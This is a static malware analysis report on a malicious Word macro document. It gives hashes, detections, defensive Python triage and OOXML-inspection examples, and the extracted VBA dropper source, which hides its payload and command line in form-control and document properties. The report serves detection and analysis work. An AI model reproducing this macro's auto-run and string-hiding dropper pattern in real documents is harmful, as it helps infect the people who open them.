Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 99d22eb3d584f502…

MALICIOUS

Office (OOXML)

Size: 380.6 KB
Created: 2020-08-11 10:03:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-09-07
MD5: bbea719b296b81cb70e294246c9d6eae
SHA-1: d79c7c9a0ddc7d3c7d90eb90f47783e999bb7ebd
SHA-256: 99d22eb3d584f502292d847497713c8db10f7aa9d2b08f5f6da8e690be4f7832
Risk score: 178

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1105 Ingress Tool Transfer

The sample carries VBA macros with two auto-execution entry points, autoopen and autoclose. autoopen opens a file whose path begins C:\ProgramData\Nolewr (the remainder comes from the Tag property of the UserForm ijfuihifuifhuiuifggfyi), writes only whitespace into it, then calls Application.Quit with SaveChanges:=False; closing the document this way fires autoclose. autoclose opens a second file whose path begins C:\ProgramData\Portes, pads it with whitespace and lines starting with ' (VBScript-style comments), appends the Caption of a nested form control as the real content, then calls CreateObject with the form's own Caption as the ProgID and invokes .Exec with the document property Bikoter.DefaultTargetFrame (Bikoter is the ThisDocument module) as the argument. Every string that would give the dropper away (ProgID, dropped-file extension, payload body and command line) therefore lives in form-control and document properties rather than in the macro source, which defeats plain string matching on the VBA; resolving them requires extracting the UserForm storage from word/vbaProject.bin (olevba reports these as form strings) and the document settings. The .Exec method fits the WScript.Shell interface, but the ProgID is not visible in the source, so that remains an inference. The p-code heuristic finds the auto-exec and object-execution tokens in the compiled VBA stream independently of the decompressed source, so the verdict would survive source stomping. Together with the generic ClamAV dropper signature, this is consistent with a dropper that writes a script under ProgramData and launches it.
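As an added illustration, not part of this report or of the analysis engine behind it, the following Python triage pass runs over the statements of the Montag module that appear under "Extracted artifacts" below, embedded here as a constructed, shortened copy. It flags the auto-exec entry points, the two file writes, the CreateObject call whose ProgID is not a literal, the .Exec call, and lists every property read (Caption, Tag, DefaultTargetFrame) that has to be resolved from the form and document parts before the dropper's behaviour is fully known. The regexes, the list of entry-point names and the property names it looks for are the example's own assumptions, not the report's heuristics.

```python
import json
import re

# Constructed input: the statements of the "Montag" module listed on this page,
# with the long runs of padding shortened. Not a new sample.
SAMPLE_VBA = r'''
Private Hateriklahtduehhdfegtr
Sub autoopen()
Open "C:\ProgramData\Nolewr" & ijfuihifuifhuiuifggfyi.Tag For Binary As #1
Put #1, , "                    "
Close #1
Application.Quit SaveChanges:=False
End Sub
Sub autoclose()
Open "C:\ProgramData\Portes" & ijfuihifuifhuiuifggfyi.Tag For Binary As #1
Put #1, , "          '7568967735241          "
Put #1, , ijfuihifuifhuiuifggfyi.jnfddnfdfdfusdhfshfgfh.Caption
Close #1
Set Hateriklahtduehhdfegtr = CreateObject(ijfuihifuifhuiuifggfyi.Caption)
Hateriklahtduehhdfegtr.Exec Bikoter.DefaultTargetFrame
End Sub
'''

# Entry points Office runs without user interaction (the example's own list).
AUTOEXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(auto_?open|auto_?close|auto_?exec|auto_?exit|document_open|document_close|workbook_open)\s*\(",
    re.I | re.M)
OPEN_STMT = re.compile(r"^\s*Open\s+(.+?)\s+For\s+(Binary|Output|Append|Random)\b", re.I | re.M)
PUT_LITERAL = re.compile(r'^\s*Put\s+#\d+\s*,\s*,\s*"([^"]*)"', re.I | re.M)
CREATEOBJ = re.compile(r"\bCreateObject\s*\(\s*([^)]+?)\s*\)", re.I)
EXEC_CALL = re.compile(r"^\s*(\w+)\.(Exec|Run|ShellExecute)\s+(.+?)\s*$", re.I | re.M)
# Property reads that carry strings out of the macro source: UserForm control
# properties and the document's DefaultTargetFrame. Whatever matches here must
# be extracted from the form streams / document settings, not from the VBA.
PROP_REF = re.compile(
    r"\b(\w+(?:\.\w+)*\.(?:Caption|Tag|Text|Value|ControlTipText|DefaultTargetFrame))\b")


def triage(vba: str) -> dict:
    """Static triage of decompressed VBA source: entry points, file writes,
    object creation/execution and the strings that live outside the source."""
    file_writes = []
    for m in OPEN_STMT.finditer(vba):
        target = m.group(1)
        literal = re.search(r'"([^"]*)"', target)
        file_writes.append({
            "prefix": literal.group(1) if literal else None,   # literal part of the path
            "concatenated": "&" in target,                     # rest is computed at run time
            "mode": m.group(2).capitalize(),
        })
    created = [{"arg": m.group(1), "literal_progid": m.group(1).startswith('"')}
               for m in CREATEOBJ.finditer(vba)]
    execs = [{"object": m.group(1), "method": m.group(2), "arg": m.group(3)}
             for m in EXEC_CALL.finditer(vba)]
    # Literal Put payloads that are only whitespace or ' comments are padding;
    # the file's real content must then come from a property read.
    puts = PUT_LITERAL.findall(vba)
    padding_only = bool(puts) and all(s.strip() == "" or s.strip().startswith("'") for s in puts)
    return {
        "autoexec": [m.group(1).lower() for m in AUTOEXEC.finditer(vba)],
        "file_writes": file_writes,
        "createobject": created,
        "exec_calls": execs,
        "unresolved_refs": sorted(set(PROP_REF.findall(vba))),
        "literal_puts_are_padding": padding_only,
    }


def reasons(t: dict) -> list:
    """Human-readable justification for the dropper verdict."""
    r = []
    if t["autoexec"]:
        r.append("auto-exec entry point(s): " + ", ".join(t["autoexec"]))
    if t["file_writes"]:
        r.append("writes %d file(s) under %s" % (
            len(t["file_writes"]), ", ".join(w["prefix"] or "?" for w in t["file_writes"])))
    if any(not c["literal_progid"] for c in t["createobject"]):
        r.append("CreateObject with a non-literal ProgID (hidden in a property)")
    if t["exec_calls"]:
        r.append("process execution via ." + t["exec_calls"][0]["method"])
    if t["literal_puts_are_padding"]:
        r.append("literal file content is padding only; payload comes from a property read")
    return r


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(json.dumps(result, indent=2))
    print("\n".join(reasons(result)))
```

Run against the real macros.bas from olevba instead of SAMPLE_VBA, the unresolved_refs list is the work queue: each entry names a form control or document property whose value has to be pulled out of the vbaProject.bin form streams or the document settings before the ProgID, the dropped-file extension and the command line are known.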

Heuristics (7)

  • ClamAV: Doc.Dropper.Generic-9823791-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Generic-9823791-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Hateriklahtduehhdfegtr = CreateObject(ijfuihifuifhuiuifggfyi.Caption)
    Hateriklahtduehhdfegtr.Exec Bikoter.DefaultTargetFrame
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Private Hateriklahtduehhdfegtr
    Sub autoopen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    End Sub
    Sub autoclose()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the following were found in document text (OOXML body / shared strings). They are the XML namespace URIs declared in the OOXML parts of any Word 2010 document, not hosts the sample contacts; the visible macro source contains no URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4742 bytes
SHA-256: 7e7ac6d2eeb28c208b65d57054ded4a21488e1c8e3399c97d61e34e08acc4ae4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Bikoter"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Montag"
Private Hateriklahtduehhdfegtr
Sub autoopen()

Open "C:\ProgramData\Nolewr" & ijfuihifuifhuiuifggfyi.Tag For Binary As #1

Put #1, , "                                                            "
Put #1, , "                                                                                                     "
Put #1, , "                                                                                                    "
Put #1, , "                                                                                                 "

Close #1
   
Application.Quit SaveChanges:=False

End Sub
Sub autoclose()


Open "C:\ProgramData\Portes" & ijfuihifuifhuiuifggfyi.Tag For Binary As #1





Put #1, , "                       '7568967735241                                                               "
Put #1, , "                      '1242354686796                                   '235423523                              "
Put #1, , "                                       '9789789                   '679679679                               "
Put #1, , "                       '7568967735241                                                               "
Put #1, , "                      '1242354686796                                   '235423523                              "
Put #1, , "                                       '9789789                   '679679679                               "
Put #1, , "                        '7568967735241                                                               "
Put #1, , "                       '1242354686796                                   '235423523                              "
Put #1, , "                                       '9789789                   '679679679                               "
Put #1, , "                       '756896 7735241                                                               "
Put #1, , "                      '1242354686796                                   '235423523                              "
Put #1, , "                                       '9789789                   '679679679                               "
Put #1, , "                       '7568967735241                                                               "
Put #1, , "                      '1242354686796                                   '235423523                              "
Put #1, , "                                       '97897895                   '679679679                               "
Put #1, , "                       '7568967735241                                                               "
Put #1, , "                      '1242354686796                                   '235423523                              "
Put #1, , "                                       '9789789                   '679679679                               "
Put #1, , "                       '7568967735241                                                               "
Put #1, , "                      '1242354 686796                                   '235423523                              "
Put #1, , "                                       '9789789                   '679679679                               "
Put #1, , "                       '7568967735241                                                               "
Put #1, , "                      '1242354686796                                   '235423523                              "
Put #1, , "                                       '9789789                   '679679679                               "
Put #1, , "                       '7568967 735241                                                               "
Put #1, , "                      '1242354686796                                   '235423523                              "


Put #1, , ijfuihifuifhuiuifggfyi.jnfddnfdfdfusdhfshfgfh.Caption

Close #1
      
Set Hateriklahtduehhdfegtr = CreateObject(ijfuihifuifhuiuifggfyi.Caption)
Hateriklahtduehhdfegtr.Exec Bikoter.DefaultTargetFrame

End Sub



Attribute VB_Name = "ijfuihifuifhuiuifggfyi"
Attribute VB_Base = "0{516971D7-79FA-4D32-8D9C-546BC29371F8}{51B7ECD6-1ECD-4983-BBA4-0CCF5418A372}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 160768 bytes
SHA-256: 4accc3d74b83f4c203d57e132f5bb4f903c19634c780375b60300e0666dd560c
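The second artifact above was carved from the OOXML container itself. As an added example, not the analysis pipeline's code, the following Python locates a VBA project the way a triage tool should: by the part's content type in [Content_Types].xml and by the vbaProject relationship from the main document part, never by filename or extension, and then hashes the part so it can be matched against a report like this one. It builds a minimal constructed macro-enabled container in memory (the vbaProject.bin body is a placeholder, not the real 160768-byte part, so its hash is not the one listed above); the content-type and relationship-type strings are the standard ones for Word macro-enabled documents.

```python
import hashlib
import io
import xml.etree.ElementTree as ET
import zipfile

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
VBA_REL_TYPE = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
MACRO_MAIN_TYPES = {
    "application/vnd.ms-word.document.macroEnabled.main+xml",
    "application/vnd.ms-word.template.macroEnabledTemplate.main+xml",
}
PLAIN_MAIN_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"

# Constructed placeholder for the binary part. A real vbaProject.bin is an OLE
# compound file; only its location and hash are exercised here.
FAKE_VBA_BIN = b"\xd0\xcf\x11\xe0placeholder-vba-project"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_sample(with_vba: bool) -> bytes:
    """Minimal OOXML container (constructed, not the sample on this page)."""
    types = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>',
        '<Default Extension="xml" ContentType="application/xml"/>',
    ]
    rels = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">',
    ]
    if with_vba:
        types.append('<Default Extension="bin" ContentType="%s"/>' % VBA_CONTENT_TYPE)
        rels.append('<Relationship Id="rId1" Type="%s" Target="vbaProject.bin"/>' % VBA_REL_TYPE)
    main_ct = "application/vnd.ms-word.document.macroEnabled.main+xml" if with_vba else PLAIN_MAIN_TYPE
    types.append('<Override PartName="/word/document.xml" ContentType="%s"/>' % main_ct)
    types.append("</Types>")
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "".join(types))
        z.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        z.writestr("word/_rels/document.xml.rels", "".join(rels))
        if with_vba:
            z.writestr("word/vbaProject.bin", FAKE_VBA_BIN)
    return buf.getvalue()


def _content_type_lookup(z: zipfile.ZipFile):
    """Resolve a part name to its content type: Override first, then the
    Default for its extension, exactly as the package model defines it."""
    root = ET.fromstring(z.read("[Content_Types].xml"))
    defaults = {d.get("Extension").lower(): d.get("ContentType") for d in root.iter(CT_NS + "Default")}
    overrides = {o.get("PartName"): o.get("ContentType") for o in root.iter(CT_NS + "Override")}

    def lookup(name: str):
        if "/" + name in overrides:
            return overrides["/" + name]
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        return defaults.get(ext)
    return lookup


def inspect_ooxml(blob: bytes) -> dict:
    """Find VBA project parts by content type, cross-check against the main
    part's relationships, and hash each part."""
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        names = z.namelist()
        ctype = _content_type_lookup(z)
        vba_parts = [n for n in names if ctype(n) == VBA_CONTENT_TYPE]
        rel_targets = []
        rels_name = "word/_rels/document.xml.rels"
        if rels_name in names:
            for r in ET.fromstring(z.read(rels_name)).iter(REL_NS + "Relationship"):
                if r.get("Type") == VBA_REL_TYPE:
                    t = r.get("Target")
                    # Targets are relative to word/ unless they start with "/".
                    rel_targets.append(t.lstrip("/") if t.startswith("/") else "word/" + t)
        return {
            "macro_enabled_main_part": ctype("word/document.xml") in MACRO_MAIN_TYPES,
            "vba_parts": [{"name": n, "size": z.getinfo(n).file_size,
                           "sha256": sha256_hex(z.read(n))} for n in vba_parts],
            "vba_rel_targets": rel_targets,
            # A VBA part with no relationship (or vice versa) is worth a look.
            "consistent": sorted(vba_parts) == sorted(rel_targets),
        }


if __name__ == "__main__":
    print(inspect_ooxml(build_sample(True)))
    print(inspect_ooxml(build_sample(False)))
```

Applied to a real file, the SHA-256 of the returned part is what to compare with the vbaProject_00.bin hash listed above; a mismatch between the content-type view and the relationship view (consistent is False) means someone has hand-edited the container and the part deserves manual inspection.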